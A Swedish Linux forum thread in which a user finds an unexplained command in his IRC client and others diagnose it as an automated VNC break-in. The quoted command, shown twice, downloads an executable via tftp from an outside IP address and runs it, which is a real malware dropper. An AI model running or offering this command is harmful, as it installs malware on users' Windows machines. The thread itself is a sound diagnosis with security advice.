Glad att jag kör Linux

[Sprak]

Hej på er alla!

Jag haft Ubuntu i lite drygt ett halvår och idag när jag kom hem från skolan blev jag glad att jag bytte operativsystem den där varma april/maj-dagen för ett år sedan. I mitt öppna gaimfönster stod det nämligen:

Kod: Markera allt

(21.43.59) Sprak: %comspec% /c tftp -i 68.43.148.121 GET bpgiatlu.exe & start bpgiatlu

Det var något som uppenbarligen skrivits av mig när jag inte var hemma, jag antar att det är ett virus.
Det skumma att det dök bara upp i IRC-tabben - inte i någon av de MSN-fönster som jag hade öppna?

Någon som har varit med om något liknade/Vet något om säkerheten i gaim/irc?

För att undanröja en möjlig komspirationteori så innehar jag en enda nyckel inom 10 mils radie till min dörr och ja, dörren var låst när jag kom hem.
Konspirationteori nr2: Man kan ssh:a sig in på min dator och jag har en Vncserver igång - men sedan jag installerade beryl så har den inte fungerat. Kvar finns då att på något sätt kunna skriva kommentarer i gaim via terminalen, men för att kunna göra det måste personen i fråga knäcka ytterligare ett lösenord till och det känns inte som om det riktigt är värt det.

Kvar bland konspirationsteorierna är att min vaktmästare låst upp dörren bara för att skriva det meddelandet

[Okänd]

Spännande.

[Quartus]

jag har en Vncserver igång

Hur pass säkert är det lösenordet då?
Finns det med i någon ordlista?

För övrigt är ju inte Linux 100% säkert. Det finns säkert en hel del crackers som sitter inne med olika hål.

[ninetwozero]

omg om de e virus så kan du rääkna me att  blixten slår ner i dig

[Mekaniserad Apelsin]

Kod: Markera allt

(21.43.59) Sprak: %comspec% /c tftp -i 68.43.148.121 GET bpgiatlu.exe & start bpgiatlu

Konspirationteori nr2: Man kan ssh:a sig in på min dator och jag har en Vncserver igång - men sedan jag installerade beryl så har den inte fungerat. Kvar finns då att på något sätt kunna skriva kommentarer i gaim via terminalen, men för att kunna göra det måste personen i fråga knäcka ytterligare ett lösenord till och det känns inte som om det riktigt är värt det.

Starta cmd, ladda ner bpgiatlu via tftp och starta det (men stänga av cmd)... Ser mer ut som något som något skickat via vnc, och sänt kommandot Win+R precis innan, antagligen skriptat. antagligen gör inte win+r särdeles mycket på din dator, så texten hamnade i it aktiva fönster (xchat) och du har antagligen inte heller trivial ftp installerat, eller cmd.

Jag skulle gissa mig till att din brandvägg faktiskt inte stoppar vnc, tyvärr.

Edit: Vad jag försöker säga är helt enkelt att det ser ut som en alltför enkel automatisk ringa runt en range, titta vilka som har port 5900 öppen, köra en passwordcracker på den porten, och när man kommit in köra ett enkelt "paste this in run". Eftersom det sista steget endast riktar in sig mot windowsdatorer så är det alltför otroligt att de först skulle försöka ta sig förbi ssh, något som nästan endast är aktivt på *nix.

Edit2: om du kör någurlunda lika lätt lösenord till ssh kan det vara en bra idé att börja använda något längre och svårare att bryta sig förbi. Nu kör ssh en något längre period mellan varje gång man petar in några felaktiga lösenord, vilket gör att bryta sig förbi med bruteforce tar ganska mycket längre tid än vad vnc har för tillfället.

[ninetwozero]

hur vet man om vmc finns på datorn ?:p

[Mekaniserad Apelsin]

hur vet man om vmc finns på datorn ?:p

Man har aktiverat "remote desktop". Det är ett någurlunda bra sätt att styra sin dator grafiskt från en annan plats... northface har en bra guide i "howto"-delen av forumet, kom bara ihåg att om du startar share desktop, så kör det via ssh, och se till att spärra vnc utåt.